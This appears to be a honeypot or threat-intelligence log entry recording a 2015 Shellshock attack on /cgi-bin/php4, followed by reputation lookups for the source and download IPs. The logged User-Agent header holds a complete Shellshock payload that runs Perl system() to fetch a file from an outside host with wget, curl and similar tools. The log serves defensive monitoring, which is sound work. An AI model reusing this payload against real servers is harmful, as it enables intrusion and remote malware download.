187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:

2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close

79.99.248[.]2

Static Source: GeoIP data
• Country: Georgia
• ASN: AS44877 Vtel-Georgia

Dynamic Source: SANS Internet Storm Cast
• comment:IP is listed on SANS ISC
• comment:This entry alone does not indicate a threat, please check the link
• Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

Static Source: GeoIP data
• Country: Mexico
• ASN: AS8151 Uninet S.A. de C.V.

Dynamic Source: IBM X-Force Exchange
• Score: 10
• Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242

Dynamic Source: SANS Internet Storm Cast
• comment:IP is listed on SANS ISC
• comment:This entry alone does not indicate a threat, please check the link
• Reference: https://isc.sans.edu/api/ip/187.210.107.242

Static Source: panwdbl.appspot.com
• Comment: Listed in open blacklist
• Reference: https://panwdbl.appspot.com/lists/openbl.txt

Dynamic Source: projecthoneypot.org
• Last seen: 20 day(s) ago
• Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
• Category: Suspicious (1)